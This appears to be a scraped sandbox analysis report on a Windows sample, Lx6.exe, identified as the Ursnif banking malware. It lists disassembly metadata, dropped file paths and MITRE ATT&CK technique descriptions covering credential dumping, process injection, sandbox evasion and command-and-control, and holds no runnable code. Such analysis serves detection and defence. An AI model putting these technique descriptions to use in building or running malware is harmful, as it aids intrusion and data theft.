API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 564ff562a282b3eaeddeb1b27ccafaee43fa168b01f3194d6e9cd42d1538608c
Instruction ID: 14c934479bc36b71b272e23991f0801b0310c8145cf71ab827c7da303125553e
Opcode Fuzzy Hash: 564ff562a282b3eaeddeb1b27ccafaee43fa168b01f3194d6e9cd42d1538608c
Instruction Fuzzy Hash: 2531937061CB084FEBA4EF2C9885A6577E1FB98310F51466EE84DC3362DB30ED458B86

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933FA08E8 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 0000019933FA0994

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: af2fd0dd98abb7b8d80d577b2f786622d740c92051f1314d8a2dd88015a94618
Instruction ID: 156098185acef492315e55166ae0d801bb7ddac531008de952c5550bea6c5982
Opcode Fuzzy Hash: af2fd0dd98abb7b8d80d577b2f786622d740c92051f1314d8a2dd88015a94618
Instruction Fuzzy Hash: 69218E31258E0A4FFB94EF6DDC547A673E1FBA8341F80152EA50AC3360DB78DA418B41

Uniqueness

Uniqueness Score: -1.00%

Function 0000019933FA58A8 Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0000019933FA58DB

Memory Dump Source

Source File: 0000003E.00000002.793737518.0000019933F91000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000019933F91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_19933f91000_csc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a3a4d240c1ccffb2c3ca6470c4e34bcb7dec0e0d09feaf2ab0f44a5f6f15b5bf
Instruction ID: 5534c05f7bb4777b23b6e64c692e94939c1705595c33a1e7a28a5751186d0ea8
Opcode Fuzzy Hash: a3a4d240c1ccffb2c3ca6470c4e34bcb7dec0e0d09feaf2ab0f44a5f6f15b5bf
Instruction Fuzzy Hash: 4511843160CB098FEB54EF58A846579B3E5E79C310B54452DE88FC7345EE70EA058B87

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Lx6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\7C7B.bin\AuthRoot.pfx

C:\Users\user\AppData\Local\Temp\7C7B.bin\Root.pfx

C:\Users\user\AppData\Local\Temp\9AF9.bin1

C:\Users\user\AppData\Local\Temp\9F2A.bin

C:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP

C:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP

C:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP

C:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP

Windows Analysis Report
Lx6.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre